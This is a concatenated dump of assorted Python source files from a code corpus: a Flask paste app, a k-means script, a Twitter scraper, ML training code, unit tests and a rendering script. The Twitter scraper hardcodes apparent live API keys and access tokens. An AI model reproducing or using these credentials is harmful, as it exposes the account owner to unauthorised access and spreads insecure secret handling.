RuntimeError:\n abort(500)\n\n return redirect(url_for('root.show_paste', paste_id=paste_id))\n\n return render_template('index.html', form=form)\n\n\n@root_page.route('/advanced', methods=('GET', 'POST'))\ndef advanced():\n form = forms.ExtendedPasteForm()\n\n if form.validate_on_submit():\n try:\n paste_id = mulli.create_id(form.text.data)\n except ValueError:\n abort(500)\n\n try:\n utils.save_paste(paste_id, form.text.data, form.validity.data, form.syntax.data)\n except RuntimeError:\n abort(500)\n\n return redirect(url_for('root.show_paste', paste_id=paste_id))\n\n return render_template('advanced.html', form=form)\n\n\n@root_page.route('/')\ndef show_paste(paste_id):\n try:\n paste = mulli.load_entry(paste_id)\n except KeyError:\n return render_template('not_found.html'), 404\n except ValueError:\n mulli.remove_entry(paste_id)\n return render_template('not_found.html'), 404\n else:\n paste_content = paste['content']\n paste_lexer = paste['lexer']\n return render_template('paste.html', paste_id=paste_id, paste_content=paste_content, paste_lexer=paste_lexer)\n\n\n@root_page.route('/raw/')\ndef raw(paste_id):\n try:\n paste = mulli.load_entry(paste_id)\n except KeyError:\n return render_template('not_found.html'), 404\n except ValueError:\n mulli.remove_entry(paste_id)\n return render_template('not_found.html'), 404\n else:\n paste_content = paste['content']\n response = make_response(paste_content)\n response.mimetype = 'text/plain'\n return response\n\n\n@root_page.route('/about')\ndef about():\n return render_template('about.html')\n","sub_path":"pycno/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"56606731","text":"from django.urls import path\nfrom . import views\nfrom rest_framework.routers import DefaultRouter\n\nrouter = DefaultRouter()\nrouter.register('transaction', views.TransactionViewSet,\n basename='transaction')\n\nurlpatterns = [\n path('current_user', views.current_user),\n path('balance', views.BalanceList.as_view()),\n path('transactionlist', views.TransactionList.as_view()),\n path('users/', views.UserList.as_view()),\n]\n\n\nurlpatterns += router.urls\n","sub_path":"ripio-server/wallet/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"503528994","text":"import pandas as pd\nimport random\nimport numpy as np\nimport numba\nimport time\n\ndata = 'vectors_plus.csv'\nvectors = pd.read_csv(data)\nlength = len(vectors)\n\nd_f_t = (vectors != 0).astype(int).sum(axis=0)\n\n\n@numba.jit\ndef divergence_k_l(a, b):\n d = a * np.log2(a / b)\n return sum(d)\n\n\ndef divergence_akl(a, b):\n lam = random.random()\n m = lam * a + (1 - lam) * b\n return lam * divergence_k_l(a, m) + (1 - lam) * divergence_k_l(b, m)\n\n\nclass Cluster(object):\n\n def __init__(self, o):\n self.center = o\n self.array = []\n\n def set_center(self, o):\n assert o in self.array\n self.array.append(self.center)\n self.array.remove(o)\n self.center = o\n\n def add_item(self, obj):\n assert obj not in self.array\n self.array.append(obj)\n\n def remove_item(self, obj):\n assert obj in self.array\n self.array.remove(obj)\n\n def update_center(self, dataset):\n distances = {}\n center_distance = 0\n # get the distances between the center and others\n for a in self.array:\n center_distance += divergence_akl(dataset.loc[self.center], dataset.loc[a])\n distances[center_distance] = self.center\n\n for a in self.array:\n distance = 0\n for b in self.array:\n distance += divergence_akl(dataset.loc[a], dataset.loc[b])\n distance += divergence_akl(dataset.loc[self.center], dataset.loc[a])\n distances[distance] = a\n index = distances[min(distances.keys())]\n if index != self.center:\n self.set_center(index)\n\n def format_print(self):\n print(\"Cluster center: {}, array: [ \".format(self.center), end=\"\")\n for a in self.array:\n print(\"{} \".format(a), end=\"\")\n print(\"].\")\n\n\ndef save_to_csv(clusters, name):\n df = pd.DataFrame()\n for cluster in clusters:\n s = pd.Series({\"center\": cluster.center, \"array\": cluster.array})\n df = df.append(s, ignore_index=True)\n df.to_csv(name)\n\n\ndef find(clusters, obj):\n for cluster in clusters:\n if cluster.center == obj:\n return True\n else:\n for i in cluster.array:\n if i == obj:\n return True\n return False\n\n\ndef find_center(clusters, obj):\n for cluster in clusters:\n if cluster.center == obj:\n return True\n return False\n\n\ndef find_index(clusters, obj):\n for cluster in clusters:\n if cluster.center == obj:\n return clusters.index(cluster)\n else:\n for i in cluster.array:\n if i == obj:\n return clusters.index(cluster)\n return None\n\n\ndef k_means(dataset, k, func=divergence_akl, epoch=1, checkpoint=1):\n # TODO: use better method\n clusters = []\n random_list = random.sample(range(0, length), k)\n for i in range(k):\n cluster = Cluster(random_list[i])\n clusters.append(cluster)\n\n # initialize the clusters\n for i in range(length):\n if find(clusters, i):\n continue\n else:\n distances = [func(dataset.loc[i], dataset.loc[clusters[j].center]) for j in range(k)]\n index = distances.index(min(distances))\n clusters[index].add_item(i)\n\n # save_to_csv(clusters, \"result.csv\")\n for n in range(epoch):\n start_time = time.time()\n for cluster in clusters:\n cluster.update_center(dataset)\n for i in range(length):\n if find_center(clusters, i):\n continue\n distances = [func(dataset.loc[i], dataset.loc[clusters[j].center]) for j in range(k)]\n index = distances.index(min(distances))\n r_index = find_index(clusters, i)\n if index != r_index:\n clusters[r_index].remove_item(i)\n clusters[index].add_item(i)\n end_time = time.time()\n print(\n \"\\nepoch {}: There are {} clusters, these clusters are as follows. \"\n \"The time consumed is {}s\".format(n + 1,\n k,\n end_time - start_time))\n for cluster in clusters:\n cluster.format_print()\n\n if (n + 1) % checkpoint == 0:\n save_to_csv(clusters, \"results/result_{}.csv\".format(n + 1))\n\n\nif __name__ == '__main__':\n k_means(vectors, 5, divergence_akl, 100, 20)\n","sub_path":"k_means.py","file_name":"k_means.py","file_ext":"py","file_size_in_byte":4434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"567373586","text":"import tweepy\nimport pandas as pd\nimport os\nimport datetime as dt\n\n# API key: X4Y7Y04awoRF1MCyQa7GihgnP\n# API secret key: 1Df4QFiMAxSmDNx2mpFv1DSLx3CZgHwQWDC4eO3QG8T6vCXv4E\n# Bearer token: AAAAAAAAAAAAAAAAAAAAALg8HgEAAAAA39cREsdqUFaFKjLPI10LuDzSOdo%3D58W5NRZXsfjn9DT3s9kJBTuwqkPBnmxZpIdegJSfbfbpy6WYpC\n# Access token: 375970946-vtiEnm2V2cv7GehiKclmzglcOXODsiYk4NHAH6Ty\n# Access token secret: 4igL12gmSDv9hxmN9Uk87xKaMEbVUYLummFetGrLLHBT2\n\n\n# Authenticate to Twitter\ndef run(critera, quantity, language):\n auth = tweepy.OAuthHandler(\"X4Y7Y04awoRF1MCyQa7GihgnP\", \n \"1Df4QFiMAxSmDNx2mpFv1DSLx3CZgHwQWDC4eO3QG8T6vCXv4E\")\n auth.set_access_token(\"375970946-vtiEnm2V2cv7GehiKclmzglcOXODsiYk4NHAH6Ty\", \n \"4igL12gmSDv9hxmN9Uk87xKaMEbVUYLummFetGrLLHBT2\")\n api = tweepy.API(auth)\n # Realizamos la búsqueda y guardamos en listas la información de nuestro interés.\n test = []\n tweets = []\n username = []\n screen_name = []\n date = []\n hashtags = []\n results = {}\n for tweet in api.search(q=criteria, lang=language, rpp=500, count=quantity):\n tmp = tweet.entities['hashtags']\n test.append(tweet)\n tweets.append(tweet.text)\n username.append(tweet.user.name)\n screen_name.append('@'+tweet.user.screen_name)\n date.append(tweet.created_at)\n hashtags.append(tweet.entities['hashtags'])\n \n # Creamos un dataframe con la busqueda realizada.\n results = pd.DataFrame({'username':username, 'screen_name':screen_name, 'date':date, 'tweet':tweets, 'hashtags': hashtags})\n\n # Guardando los resultados en una carpeta de búsquedas\n actual_dir = os.getcwd()\n path = os.chdir(actual_dir)\n search_time = dt.datetime.now().strftime('%Y_%m_%d')\n save_directory = f'{criteria}-{search_time}'\n try:\n os.chdir(save_directory)\n _save_file(results)\n except Exception as e:\n print('Creando carpeta de busqueda.')\n os.mkdir(save_directory)\n os.chdir(save_directory)\n _save_file(results)\n\ndef _save_file(df):\n return df.to_csv(f'results-{dt.datetime.now().strftime(\"%Y_%m_%d\")}.csv')\n # Windows\n # results.to_excel('D:\\\\Projects\\\\tweetsScraper\\\\results.xlsx')\n\nif __name__ == \"__main__\":\n print('Programa que te devuelve la cantidad de tweets definida por ti, según tu criterio de búsqueda.')\n select = int(input(\"\"\"Selecciona el idioma de tu preferencia:\n 1. Español\n 2. Inglés\n \"\"\"))\n language = ''\n if select == 1:\n language = 'es'\n elif select == 2:\n language = 'en'\n else:\n print('Selección no válida')\n print('Se selecciona español por defecto')\n language = 'es'\n \n\n criteria = input('Qué deseas buscar en twitter? ')\n quantity = int(input('Cuántos tweets deseas obtener? '))\n run(criteria, quantity, language)","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"596756548","text":"#Problem:\n#You are given an array rectangles where rectangles[i] = [li, wi] represents the ith rectangle of length li and width wi.\n#You can cut the ith rectangle to form a square with a side length of k if both k <= li and k <= wi. For example, \n#if you have a rectangle [4,6], you can cut it to get a square with a side length of at most 4.\n#Let maxLen be the side length of the largest square you can obtain from any of the given rectangles.\n#Return the number of rectangles that can make a square with a side length of maxLen.\n\n#Solution:\ndef countGoodRectangles(rectangles):\n \"\"\"\n :type rectangles: List[List[int]]\n :rtype: int\n \"\"\"\n possibleSquares = []\n for i in range(len(rectangles)):\n possibleSquares.append(min(rectangles[i][0],rectangles[i][1]))\n return possibleSquares.count(max(possibleSquares))\n","sub_path":"greedy-algorithm/maxTriangle.py","file_name":"maxTriangle.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"352224241","text":"# import numpy as np\nimport os\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom argparse import ArgumentParser\nfrom tqdm import tqdm\n\nfrom models import LanguageModel, BPCLoss\nfrom utils import (\n load_corpus, Voc, ContinuousTextDataset, TestDataset, train_path,\n valid_path)\n\n\ndef validation(model, dataset):\n model.eval()\n with torch.no_grad():\n total_loss = 0\n total_cnt = 0\n hidden = model.init_hidden(dataset.batch_size)\n for _, batch in enumerate(dataset):\n x_batch = torch.tensor(\n batch['one_hot'][:, : -1]).float()\n y_batch = torch.tensor(\n batch['idx'][:, 1:].long()).flatten()\n if torch.cuda.device_count() > 0:\n x_batch = x_batch.cuda()\n y_batch = y_batch.cuda()\n output, hidden = model(x_batch, hidden)\n loss = criterion(output, y_batch)\n total_loss += loss.item() * y_batch.size()[0]\n total_cnt += y_batch.size()[0]\n model.train()\n return total_loss / total_cnt\n\n\nif __name__ == '__main__':\n parser = ArgumentParser()\n parser.add_argument(\n '--path', help='save model to where', type=str, required=True)\n args = parser.parse_args()\n\n # parameters\n lr = 0.0005\n epochs = 5\n batch_size = 200\n clip = 0.05\n\n chunk_size = 20\n hidden_size = 512\n num_layers = 2\n dropout = 0.2\n\n # load dataset\n train_text = load_corpus(train_path)\n valid_text = load_corpus(valid_path)\n voc = Voc(train_text)\n\n train_dataset = ContinuousTextDataset(\n train_text, chunk_size, batch_size, voc)\n valid_dataset = ContinuousTextDataset(\n valid_text, chunk_size, batch_size, voc)\n\n # create model\n model = LanguageModel(\n voc.size(), hidden_size, voc.size(), dropout, num_layers)\n optimizer = optim.Adam(model.parameters(), lr=lr)\n criterion = nn.CrossEntropyLoss()\n # criterion = BPCLoss()\n\n if torch.cuda.is_available() > 0:\n model = model.cuda()\n criterion = criterion.cuda()\n\n try:\n for epoch in range(epochs):\n with tqdm(total=len(train_dataset)) as pbar:\n pbar.write('Epoch %d/%d' % (epoch + 1, epochs))\n hidden = model.init_hidden(batch_size)\n for i_batch, batch in enumerate(train_dataset):\n x_batch = torch.tensor(\n batch['one_hot'][:, : -1]).float()\n y_batch = torch.tensor(\n batch['idx'][:, 1:]).long().flatten()\n if torch.cuda.is_available() > 0:\n x_batch = x_batch.cuda()\n y_batch = y_batch.cuda()\n output, hidden = model(x_batch, hidden)\n output = output.view((-1, voc.size()))\n loss = criterion(output, y_batch)\n optimizer.zero_grad()\n loss.backward()\n torch.nn.utils.clip_grad_norm_(model.parameters(), clip)\n optimizer.step()\n pbar.update(1)\n pbar.set_postfix(loss='%.4f' % loss.item())\n\n train_loss = validation(model, train_dataset)\n valid_loss = validation(model, valid_dataset)\n\n pbar.set_postfix(\n loss='%.4f' % train_loss, val_loss='%.4f' % valid_loss)\n if not np.isnan(valid_loss):\n os.makedirs(os.path.dirname(args.path), exist_ok=True)\n torch.save(model, args.path)\n\n except KeyboardInterrupt:\n pass\n","sub_path":"HW3/train2.py","file_name":"train2.py","file_ext":"py","file_size_in_byte":3648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"455174999","text":"\"\"\"Module for testing individual functions of basic operations\"\"\"\n\nimport unittest\nfrom unittest import TestCase\n\nimport customer_model as cm\nimport basic_operations as bo\n\n\nclass BasicOperationsTest(TestCase):\n \"\"\"Testing basic operations\"\"\"\n\n @classmethod\n def setUp(cls):\n \"\"\"Setup database\"\"\"\n cm.DATABASE.drop_tables([cm.Customer])\n cm.DATABASE.create_tables([cm.Customer])\n\n @classmethod\n def tearDown(cls):\n \"\"\"Close database\"\"\"\n cm.DATABASE.close()\n\n def test_add_customer(self):\n \"\"\"Test adding a new customer\"\"\"\n bo.add_customer('100', 'Peter', 'Parker',\n '135 W. 50th Street, New York City, NY 10011',\n '212-576-4000', 'peter.parker@marvel.com',\n True, 1000)\n bo.add_customer('200', 'Iron', 'Man',\n '17801 International Blvd, Seattle, WA 98101',\n '206-787-5388', 'iron.man@gmail.com',\n True, 5000)\n bo.add_customer('300', 'Ramkumar', 'Rajanbabu',\n '7525 166th Ave NE, Redmond, WA 98052',\n '425-556-2900', 'ram.kumar@gmail.com',\n False, 7078)\n\n a_customer_1 = cm.Customer.get(cm.Customer.customer_id == '100')\n self.assertEqual(a_customer_1.customer_id, '100')\n self.assertEqual(a_customer_1.phone_number, '212-576-4000')\n self.assertEqual(a_customer_1.status, True)\n\n a_customer_2 = cm.Customer.get(cm.Customer.customer_id == '200')\n self.assertEqual(a_customer_2.customer_id, '200')\n self.assertEqual(a_customer_2.home_address,\n '17801 International Blvd, Seattle, WA 98101')\n self.assertEqual(a_customer_2.email_address, 'iron.man@gmail.com')\n\n a_customer_3 = cm.Customer.get(cm.Customer.customer_id == '300')\n self.assertEqual(a_customer_3.customer_id, '300')\n self.assertEqual(a_customer_3.status, False)\n self.assertEqual(a_customer_3.credit_limit, 7078)\n\n def test_search_customer(self):\n \"\"\"Test searching for a customer\"\"\"\n bo.add_customer('100', 'Peter', 'Parker',\n '135 W. 50th Street, New York City, NY 10011',\n '212-576-4000', 'peter.parker@marvel.com',\n True, 1000)\n\n actual = bo.search_customer('100')\n expected = {'first_name': 'Peter', 'last_name': 'Parker',\n 'email_address': 'peter.parker@marvel.com',\n 'phone_number': '212-576-4000'}\n self.assertEqual(actual, expected)\n\n def test_search_customer_fail(self):\n \"\"\"Test searching for a customer (fail)\"\"\"\n actual = bo.search_customer('100') # Not in table\n expected = {}\n self.assertEqual(actual, expected)\n\n def test_delete_customer(self):\n \"\"\"Test deleting a customer\"\"\"\n bo.add_customer('100', 'Peter', 'Parker',\n '135 W. 50th Street, New York City, NY 10011',\n '212-576-4000', 'peter.parker@marvel.com',\n True, 1000)\n\n bo.delete_customer('100')\n actual = bo.search_customer('100')\n expected = {}\n self.assertEqual(actual, expected)\n\n def test_delete_customer_fail(self):\n \"\"\"Test deleting a customer (fail)\"\"\"\n with self.assertRaises(ValueError):\n bo.delete_customer('100') # Not in table\n\n def test_update_customer_credit(self):\n \"\"\"Test updating customer credit limit\"\"\"\n bo.add_customer('100', 'Peter', 'Parker',\n '135 W. 50th Street, New York City, NY 10011',\n '212-576-4000', 'peter.parker@marvel.com',\n True, 1000)\n\n bo.update_customer_credit('100', 2000)\n a_customer = cm.Customer.get(cm.Customer.customer_id == '100')\n actual = a_customer.credit_limit\n expected = 2000\n self.assertEqual(actual, expected)\n\n def test_update_customer_credit_fail(self):\n \"\"\"Test updating customer credit limit (fail)\"\"\"\n with self.assertRaises(ValueError):\n bo.update_customer_credit('100', 2000) # Not in table\n\n def test_list_active_customers(self):\n \"\"\"Test listing active customers\"\"\"\n bo.add_customer(\"100\", \"Peter\", \"Parker\",\n \"135 W. 50th Street, New York City, NY 10011\",\n \"212-576-4000\", \"peter.parker@marvel.com\",\n True, \"1000.10\")\n\n bo.add_customer(\"200\", \"Iron\", \"Man\",\n \"17801 International Blvd, Seattle, WA 98101\",\n \"206-787-5388\", \"iron.man@gmail.com\",\n True, \"5000\")\n\n bo.add_customer(\"300\", \"Ramkumar\", \"Rajanbabu\",\n \"7525 166th Ave NE, Remond, WA 98052\",\n \"425-556-2900\", \"ram.kumar@gmail.com\",\n False, \"7078.25\")\n\n # Only 2 active customers (2 True)\n self.assertEqual(bo.list_active_customers(), 2)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"students/ramkumar_rajanbabu/lesson_03/assignment/test_unit.py","file_name":"test_unit.py","file_ext":"py","file_size_in_byte":5157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"357934108","text":"import numpy as np\nimport sys\n\nfrom keras.models import Model\nfrom keras.layers import Input, Conv1D, Reshape, LeakyReLU, BatchNormalization, Flatten, Dense, Conv2D, Dropout\n\n\nclass Discriminator:\n def __init__(self, input_shape):\n self.input_shape = input_shape\n pass\n\n\n def build_discriminator(self, filters, summary=False):\n def conv(layer, f, k_size=4, s_size=2, dropout=0.0, normalize=True):\n c = Conv1D(filters=f,\n kernel_size=k_size,\n strides=s_size,\n padding=\"same\")(layer)\n c = LeakyReLU(alpha=0.2)(c)\n if dropout:\n c = Dropout(dropout)(c)\n\n if normalize:\n c = BatchNormalization()(c)\n return c\n\n input = Input(shape=self.input_shape)\n\n c = Reshape(target_shape=(-1, 1))(input)\n c = conv(c, filters, normalize=False)\n c = conv(c, filters * 2, k_size=3, dropout=0.5)\n c = conv(c, filters * 4, k_size=3, dropout=0.5)\n c = conv(c, filters * 8, k_size=3, dropout=0.5)\n c = Flatten()(c)\n c = Dense(units=128)(c)\n c = LeakyReLU(0.2)(c)\n output = Dense(units=1, activation=\"sigmoid\")(c)\n\n model = Model(inputs=input, outputs=output)\n if summary:\n model.summary()\n\n return model\n\n\nif __name__ == \"__main__\":\n disc = Discriminator(input_shape=(1024 // 2, 2))\n disc.build_discriminator(filters=16, summary=True)\n","sub_path":"discriminator.py","file_name":"discriminator.py","file_ext":"py","file_size_in_byte":1497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"155980522","text":"# -*- coding:utf-8 -*-\nfrom __future__ import absolute_import, division, print_function, unicode_literals\n\nimport errno\n\nimport six\nimport yaml\n\nfrom .messaging import die\n\n\ndef safe_load(fp_or_text):\n obj = yaml.safe_load(fp_or_text)\n return all_strs_text(obj)\n\n\ndef load_file_or_die(filename):\n try:\n with open(filename, 'r') as fp:\n return safe_load(fp)\n except IOError as exc:\n if exc.errno == errno.ENOENT:\n die('File does not exist!')\n raise\n\n\ndef save_file(filename, data):\n with open(filename, 'w') as fp:\n save_fp(fp, data)\n\n\ndef save_fp(fp, data):\n yaml.safe_dump(\n data,\n fp,\n allow_unicode=True,\n width=10000,\n )\n\n\ndef all_strs_text(obj):\n \"\"\"\n PyYAML refuses to load strings as 'unicode' on Python 2 - recurse all over\n obj and convert every string.\n \"\"\"\n if isinstance(obj, six.binary_type):\n return obj.decode('utf-8')\n elif isinstance(obj, list):\n return [all_strs_text(x) for x in obj]\n elif isinstance(obj, tuple):\n return tuple(all_strs_text(x) for x in obj)\n elif isinstance(obj, dict):\n return {six.text_type(k): all_strs_text(v) for k, v in six.iteritems(obj)}\n else:\n return obj\n","sub_path":"treehugger/yaml.py","file_name":"yaml.py","file_ext":"py","file_size_in_byte":1263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"376736838","text":"import numpy as np\nimport pandas as pd\n\nclass MTE_one_shot:\n \n def __init__(self, folds, smooth, seed=42):\n self.folds = folds\n self.seed = seed\n self.smooth = smooth\n \n def fit_transform(self, train, x_col, y_col, y_mean=None, out_col = None, out_dtype=None):\n \n self.y_col = y_col\n np.random.seed(self.seed)\n \n if 'fold' not in train.columns:\n fsize = len(train)//self.folds\n train['fold'] = 1\n train['fold'] = train['fold'].cumsum()\n train['fold'] = train['fold']//fsize\n train['fold'] = train['fold']%self.folds\n \n if out_col is None:\n tag = x_col if isinstance(x_col,str) else '_'.join(x_col)\n out_col = f'TE_{tag}_{self.y_col}'\n \n if y_mean is None:\n y_mean = train[y_col].mean()#.compute().astype('float32')\n self.mean = y_mean # mean도 누적해서 바꿔주면 좋을듯\n \n cols = ['fold',x_col] if isinstance(x_col,str) else ['fold']+x_col\n \n agg_each_fold = train.groupby(cols).agg({y_col:['count','sum']}).reset_index()\n agg_each_fold.columns = cols + ['count_y','sum_y']\n \n agg_all = agg_each_fold.groupby(x_col).agg({'count_y':'sum','sum_y':'sum'}).reset_index()\n cols = [x_col] if isinstance(x_col,str) else x_col\n agg_all.columns = cols + ['count_y_all','sum_y_all']\n \n agg_each_fold = agg_each_fold.merge(agg_all,on=x_col,how='left')\n agg_each_fold['count_y_all'] = agg_each_fold['count_y_all'] - agg_each_fold['count_y']\n agg_each_fold['sum_y_all'] = agg_each_fold['sum_y_all'] - agg_each_fold['sum_y']\n agg_each_fold[out_col] = (agg_each_fold['sum_y_all']+self.smooth*self.mean)/(agg_each_fold['count_y_all']+self.smooth)\n agg_each_fold = agg_each_fold.drop(['count_y_all','count_y','sum_y_all','sum_y'],axis=1)\n \n agg_all[out_col] = (agg_all['sum_y_all']+self.smooth*self.mean)/(agg_all['count_y_all']+self.smooth)\n agg_all = agg_all.drop(['count_y_all','sum_y_all'],axis=1)\n \n if hasattr(self, 'agg_all'):\n print('train2')\n self.agg_all = pd.concat([self.agg_all, agg_all])\n \n else:\n print('train1')\n self.agg_all = agg_all\n \n self.agg_all = self.agg_all.drop_duplicates(x_col, keep='last')\n\n train.columns\n cols = ['fold',x_col] if isinstance(x_col,str) else ['fold']+x_col\n train = train.merge(agg_each_fold,on=cols,how='left')\n del agg_each_fold\n \n train[out_col] = train[out_col].fillna(self.mean)\n \n if out_dtype is not None:\n train[out_col] = train[out_col].astype(out_dtype)\n return train\n \n def transform(self, test, x_col, out_col = None, out_dtype=None): \n if out_col is None:\n tag = x_col if isinstance(x_col,str) else '_'.join(x_col)\n out_col = f'TE_{tag}_{self.y_col}'\n test = test.merge(self.agg_all,on=x_col,how='left')\n test[out_col] = test[out_col].fillna(self.mean)\n\n if out_dtype is not None:\n test[out_col] = test[out_col].astype(out_dtype)\n return test","sub_path":"utils/target_encode.py","file_name":"target_encode.py","file_ext":"py","file_size_in_byte":3261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"45475625","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCustom focal loss function for pytorch.\n\"\"\"\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass focal(nn.Module):\n \"\"\"\n Loss function for classification tasks with\n large data imbalance. Focal loss (FL) is define as:\n FL(p_t) = -alpha*((1-p_t)^gamma))*log(p_t),\n where p_t is a cross-entropy loss for binary classification.\n For more details, see https://arxiv.org/abs/1708.02002.\n \"\"\"\n def __init__(self, alpha=0.5, gamma=2, with_logits=True):\n \"\"\"\n Args:\n alpha (float): \"balance\" coefficient,\n gamma (float): \"focusing\" parameter (>=0),\n with_logits (bool): indicates if the sigmoid operation was applied\n at the end of a neural network's forward path.\n \"\"\"\n super(focal, self).__init__()\n self.alpha = alpha\n self.gamma = gamma\n self.logits = with_logits\n\n def forward(self, images, labels):\n \"\"\"Calculate focal loss\"\"\"\n if self.logits:\n CE_loss = F.binary_cross_entropy_with_logits(images, labels)\n else:\n CE_loss = F.binary_cross_entropy(images, labels)\n pt = torch.exp(-CE_loss)\n F_loss = self.alpha * (1-pt)**self.gamma * CE_loss\n return F_loss\n","sub_path":"DefectNet/loss.py","file_name":"loss.py","file_ext":"py","file_size_in_byte":1290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"497264401","text":"\r\n\r\nimport numpy as np\r\nimport pandas as pd \r\nimport random\r\n\r\nfile = pd.ExcelFile('making_zero_list.xlsx') \r\ndf = file.parse('main') \r\n\r\ndef delete_some_zeros(df,df_out,remove_perc):\r\n \r\n zeros_list = df_out ==0\r\n zero_indices = [] \r\n count = 0\r\n \r\n for i in zeros_list:\r\n if i == True :\r\n zero_indices.append(count)\r\n count += 1\r\n \r\n n = round(remove_perc*len(zero_indices))\r\n drop_indices = random.sample(zero_indices,n) \r\n df_subset = df.drop(drop_indices)\r\n\r\n return df_subset\r\n\r\n\r\n#a = delete_some_zeros(df,df['band_gap'],0.8)","sub_path":"delete_some_zeros.py","file_name":"delete_some_zeros.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"369016445","text":"#!/usr/bin/env python3\nimport sys\nimport math\n\ndef solve(P: int):\n conis = []\n for i in range(10,0,-1):\n conis.append(math.factorial(i))\n ans = 0\n for i in conis:\n #print('i=' + str(i))\n while P - i >= 0:\n P -= i\n ans +=1\n #print(i,P,ans)\n print(ans)\n return\n\n\n# Generated by 2.4.0 https://github.com/kyuridenamida/atcoder-tools (tips: You use the default template now. You can remove this line by using your custom template)\ndef main():\n def iterate_tokens():\n for line in sys.stdin:\n for word in line.split():\n yield word\n tokens = iterate_tokens()\n P = int(next(tokens)) # type: int\n solve(P)\n\nif __name__ == '__main__':\n main()\n","sub_path":"abc208/B/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"318007625","text":"import sys\nsys.path.append('../')\n\nimport os\nimport pickle\nimport shutil\nfrom pathlib import Path\n\nimport numpy as np\n\nfrom py_diff_pd.common.common import create_folder, print_info, ndarray\nfrom py_diff_pd.core.py_diff_pd_core import HexMesh3d\nfrom py_diff_pd.common.display import render_hex_mesh\nfrom py_diff_pd.common.renderer import PbrtRenderer\nfrom py_diff_pd.common.project_path import root_path\nfrom py_diff_pd.common.hex_mesh import hex2obj\n\ndef render_starfish_3d(mesh_folder, img_name):\n # Read mesh.\n mesh = HexMesh3d()\n mesh.Initialize(str(mesh_folder / 'body.bin'))\n\n options = {\n 'file_name': img_name,\n 'resolution': (800, 600),\n 'sample': 512,\n 'max_depth': 3,\n 'light_map': 'uffizi-large.exr',\n 'camera_pos': (0, -1.0, 0.5),\n 'camera_lookat': (0, 0, 0),\n }\n renderer = PbrtRenderer(options)\n renderer.add_hex_mesh(mesh, render_voxel_edge=True, color=(.6, .3, .2),\n transforms=[\n ('s', 0.075),\n ('t', (0, -0.2, 0.1))\n ])\n renderer.add_tri_mesh(Path(root_path) / 'asset/mesh/curved_ground.obj',\n texture_img='chkbd_24_0.7', color='064273')\n renderer.render(verbose=True, nproc=None)\n\ndef render_starfish_actuator(mesh_folder, img_name):\n options = {\n 'file_name': img_name,\n 'resolution': (800, 600),\n 'sample': 512,\n 'max_depth': 3,\n 'light_map': 'uffizi-large.exr',\n 'camera_pos': (0, -1.0, 0.5),\n 'camera_lookat': (0, 0, 0),\n }\n renderer = PbrtRenderer(options)\n\n # Peek muscle numbers.\n muscle_num = 0\n while True:\n f = mesh_folder / 'muscle/{}.obj'.format(muscle_num)\n if not f.exists(): break\n muscle_num += 1\n assert muscle_num >= 0\n for i in range(muscle_num):\n f = mesh_folder / 'muscle/{}.obj'.format(i)\n renderer.add_hex_mesh(str(f), render_voxel_edge=True, texture_img='act.png',\n color=(1, 1, 1),\n transforms=[\n ('s', 0.075),\n ('t', (0, -0.2, 0.1))\n ])\n # Draw wireframe of the body.\n mesh = HexMesh3d()\n mesh.Initialize(str(mesh_folder / 'body.bin'))\n vertices, faces = hex2obj(mesh)\n for f in faces:\n for i in range(4):\n vi = vertices[f[i]]\n vj = vertices[f[(i + 1) % 4]]\n # Draw line vi to vj.\n renderer.add_shape_mesh({\n 'name': 'curve',\n 'point': ndarray([vi, (2 * vi + vj) / 3, (vi + 2 * vj) / 3, vj]),\n 'width': 0.01\n },\n color=(.6, .3, .2),\n transforms=[\n ('s', 0.075),\n ('t', (0, -0.2, 0.1))\n ])\n\n renderer.add_tri_mesh(Path(root_path) / 'asset/mesh/curved_ground.obj',\n texture_img='chkbd_24_0.7', color='064273')\n renderer.render(verbose=True, nproc=None)\n\nif __name__ == '__main__':\n # Download the mesh data from Dropbox and put them in a folder as follows:\n # - starfish_3d\n # - init\n # - ppo\n # - diffpd\n folder = Path('starfish_3d')\n\n for mesh_folder in ['init', 'ppo', 'diffpd']:\n print_info('Processing {}...'.format(mesh_folder))\n render_folder = folder / '{}_render'.format(mesh_folder)\n create_folder(render_folder)\n render_act_folder = folder / '{}_render_act'.format(mesh_folder)\n create_folder(render_act_folder)\n\n # Peek the frame number.\n frame_num = 0\n while True:\n f = folder / mesh_folder / '{}'.format(frame_num)\n if not f.exists(): break\n frame_num += 1\n assert frame_num >= 0\n print_info('{} frames in total.'.format(frame_num))\n\n # Loop over all frames.\n for i in range(frame_num):\n render_starfish_3d(folder / mesh_folder / '{}'.format(i), render_folder / '{:04d}.png'.format(i))\n render_starfish_actuator(folder / mesh_folder / '{}'.format(i), render_act_folder / 